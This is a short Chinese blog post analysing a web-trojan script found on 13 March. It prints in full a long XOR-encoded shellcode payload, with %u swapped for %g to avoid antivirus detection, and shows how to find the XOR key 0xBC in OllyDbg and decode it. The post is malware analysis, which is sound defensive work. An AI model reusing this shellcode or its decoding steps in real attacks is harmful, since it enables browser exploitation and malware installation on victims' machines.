3月13日挂马分析报告[XOR]

 

 

总是不坚持...哎...太忙了...

Begin:

1、hxxp://s.rdeg42.cn/03/5.js

这个...很容易可以看出来

要把Game换成%u(注:为了防止杀软误报本页,将%u换成了%g)

%g11eb%g4b5b%gc933%g96b9%g0005%g8000%g0b34%ge2bc%gebfa%ge805%gffea%gffff%g8454%gbcbf%gd4bc%g9cbc%gbcbc%gbcd6%g6c43%g3a05%gbcb9%g37bc%g5744%ge2b9%g184f%g6c43%g4a54%g4343%g5443%gbf83%gbcbc%g4437%g8454%gbcbc%g54bc%gbdf3%gbcbc%gfa54%gbcbc%g54bc%gbf61%gbcbc%g4437%g9e54%gbcbc%g54bc%gbdfa%gbcbc%g8c54%gbcbc%g54bc%gbf37%gbcbc%g4437%gb054%gbcbc%g54bc%gbddf%gbcbc%ga654%gbcbc%g57bc%gefe4%g6037%gd6ef%gd4fc%gacbc%gbcbc%g54eb%gbe0f%gbcbc%g5954%gbcbc%ge4bc%gef7f%g6037%gd6ef%gd49c%gacbc%gbcbc%g54eb%gbe27%gbcbc%g7154%gbcbc%ge4bc%geb7f%g8254%gbcb8%g37bc%g8f44%gf575%g7c8f%g7f0c%g4e40%g3112%g43fb%g7fe3%g82e7%gbb7a%g8204%ge335%g82bd%g7bda%gb9fb%g5c43%g557f%gb82b%gbcbc%g3de7%ga850%gbcbd%g37bc%g8268%gbe7b%gd1df%g9cd8%g7b82%gb8fe%gdf93%g9e9c%g7e3f%g8fb4%gec7c%gd4ec%gbdb8%gbcbc%gefee%g54ec%gbf7f%gbcbc%g6c43%g4037%g7b37%g7c3f%g82b4%ga436%g6738%gbfc8%g57fc%g824a%gbc7a%g8f9e%g826e%gec34%g3fbd%ge850%g7c8f%g678f%g7037%g443f%gc1e8%g82b5%ga035%g3fb4%gb87c%g4e57%g7037%g6537%g7f3f%g8fac%g827c%gff7b%gbd90%gbcbc%gedbc%gecef%gecec%gecec%gebec%g54ec%gbf87%gbcbc%ga554%gbcbc%gd8bc%gb81d%gbcbc%g31bc%gdc1c%g4343%g5443%gbf85%gbcbc%g678f%gefef%gefef%g6c43%g843c%gc855%g3cb9%g5484%gb3c9%gc43d%g2cb9%g2c2c%gc82c%ge9ba%g5037%gfc31%g43b9%g545c%g4390%g4343%g547f%g439a%g4343%gad04%gb8bd%g7e3c%gbcb0%ga554%g4343%g8f43%gec7c%g54e8%gbce8%gbcbc%g54ec%gbe37%gbcbc%g6c43%g3c8a%g9880%gcbbc%g54b6%gbefd%gbcbc%g438f%g43eb%g546c%gbd47%gbcbc%g43d4%gbcbc%g43bc%g546c%g425a%g4343%gebef%g8fea%gec7c%g54e8%gbca2%gbcbc%g54ec%gbee9%gbcbc%g6c43%g3c8a%g9880%gcbbc%g54b6%gbeb7%gbcbc%g438f%g43eb%ge46c%ge3e2%g7fe7%gbe57%g7fe4%g4554%g4343%gea43%g3feb%gb450%g4037%gb4d6%g82eb%gcb43%g54a8%gbee1%gbcbc%g6c43%g4037%gddd4%gd9d1%gd4bc%gf9f5%gcefa%g4837%gb405%gbcbc%g4fbc%gc91a%gd693%g82bc%gc843%g9c98%g9854%gbcbe%g43bc%g376c%g5444%gbd77%gbcbc%g6c43%g4487%gb4c8%g378a%g98f8%g829c%gbc43%g4382%g98c8%g54a0%gbd53%gbcbc%g6c43%g783f%ge3ac%g04e2%gbcbd%gbcbc%gd47f%gd2d3%gbcbc%gc9d4%gd0ce%g57d1%g31a9%g98f8%gecb8%g9c54%g4342%gec43%gf654%gbcbe%g55bc%g425c%g4343%g5a54%g4343%g3f43%gb478%gd67f%gd4d0%gc8d2%gd0d8%ga957%gf831%gb898%g54ec%g4145%g4343%g54ec%gbe9f%gbcbc%g0555%g4342%g5443%g435a%g4343%g783f%g7fb4%g8fd4%gbc8e%gd4bc%gcfc9%gced9%ga957%gf831%gb898%g54ec%g4173%g4343%g54ec%gbd45%gbcbc%g3355%g4342%g5443%g435a%g4343%g783f%g7fb4%gdfd4%gcbca%gd4bc%gd4cf%gd3d8%ga957%gf831%gb898%g54ec%g4119%g4343%g54ec%gbd73%gbcbc%gd955%g4342%g5443%g435a%g4343%g783f%g7fb4%gcad4%gc4db%g57bc%g31a9%g98f8%gecb8%g3c54%g4341%gec43%g1654%gbcbd%g55bc%g42fc%g4343%g5a54%g4343%g3f43%gb878%g547f%gbd17%gbcbc%ga7d4%gfa7a%gecc5%g7a54%gbcbd%g3fbc%gb478%g547f%gbd2b%gbcbc%g50d4%gbf2b%gecb0%g0e54%gbcbd%g3fbc%gb478%g547f%gbd3f%gbcbc%g16d4%gb140%gecc0%g2254%gbcbd%g3fbc%gb478%g547f%gbdd3%gbcbc%g51d4%g53ea%gec8a%g3654%gbcbd%g3fbc%gb478%g547f%gbde7%gbcbc%g4cd4%gb836%gece3%gca54%gbcbd%g3fbc%gb478%g547f%g424b%g4343%gc4d4%g67d4%geca0%gde54%gbcbd%g3fbc%gb478%g547f%gbd8f%gbcbc%gc2d4%g5e64%geccf%gf254%gbcbd%g3fbc%gb478%g547f%gbda3%gbcbc%g0cd4%g91f5%gec67%g8654%gbcbd%g3fbc%gb478%g547f%g438a%g4343%g17d4%g27e2%geca2%g9a54%gbcbd%g3fbc%gb478%g547f%g421b%g4343%ge5d4%g3d2b%gecbe%gae54%gbcbd%g3fbc%gb478%g547f%gbc5f%gbcbc%gc2d4%g5e64%geccf%g4254%gbcbc%g3fbc%gb478%g547f%gbc73%gbcbc%g22d4%g0745%gec89%g5654%gbcbc%g3fbc%gb478%g547f%g422e%g4343%gebd4%g091c%gec07%g6a54%gbcbc%g3fbc%gb478%g547f%g42c2%g4343%ga6d4%ga2c6%gecbe%g7e54%gbcbc%g3fbc%gb478%g547f%g42d6%g4343%g5cd4%g8ce7%gec28%g1254%gbcbc%g3fbc%gb478%g547f%g42ea%g4343%g2bd4%g5e75%gec1f%g2654%gbcbc%g3fbc%gb478%g547f%g42fe%g4343%gd4d4%g7998%gec0f%g3a54%gbcbc%g3fbc%gb478%g547f%gbceb%gbcbc%gced4%g0f42%gecaa%gce54%gbcbc%g3fbc%gb478%g547f%g42f8%g4343%gaf57%gd9d6%g54ec%g4749%g4343%g54ec%g4217%g4343%g0955%g4340%g5443%g4354%g4343%g547f%g4115%g4343%gf3d4%gf353%gecb9%g8254%gbcbc%g3fbc%gb478%g547f%gbcb3%gbcbc%g32d4%gb2f2%gec50%g9654%gbcbc%g3fbc%gb478%g8f7f%gd87c%gfc37%g398c%gc47c%g82ac%gfc37%g82b0%gcc37%g11a0%g3782%gb4fc%g577f%g82b7%gfc37%g3f88%gc07c%g3782%g80fc%gdc7f%g378a%g98d0%g8a98%gf937%g8a80%ge837%gc494%g69bf%g3782%ga4f6%g3782%g9ce6%g61bf%g875f%g82f5%g8837%gbf37%g8f49%g8f43%g407c%g3810%gc87c%g7dbb%gb173%g44bf%g4857%g878a%g98c0%gc994%g8263%ge637%gbf98%g8261%g37da%gf7b0%g3782%ga0e6%g61bf%g3782%g37b8%g79bf%g358a%g98f8%gdda0%g547f%g47d8%g4343%gc8d4%gccc8%g9386%gcb93%g928d%gcfda%gdad8%g92d9%gd3df%g93d1%g8d8c%gd093%gd992%gd9c4%gbcbc%gbcbc

直接解密..会发现是一段乱码...

千万别以为他没用...

使用Redoce的%u枚举功能..会发现枚举出了XOR,但是没用,还是堆乱码

但至少说明了他有XOR..

因此...代入Ollydbg...可见:

0040500B    80340B BC       xor     byte ptr [ebx+ecx], 0BC

说明XOR是0BC

此时可以不用继续往下带了...

直接把XOR代入Redoce等就可以解密了...

继续往下看,基本和IE7 0D的漏洞差不多了....

不再作介绍..

为何不留个言呢?

我要把我的最新文章显示在这!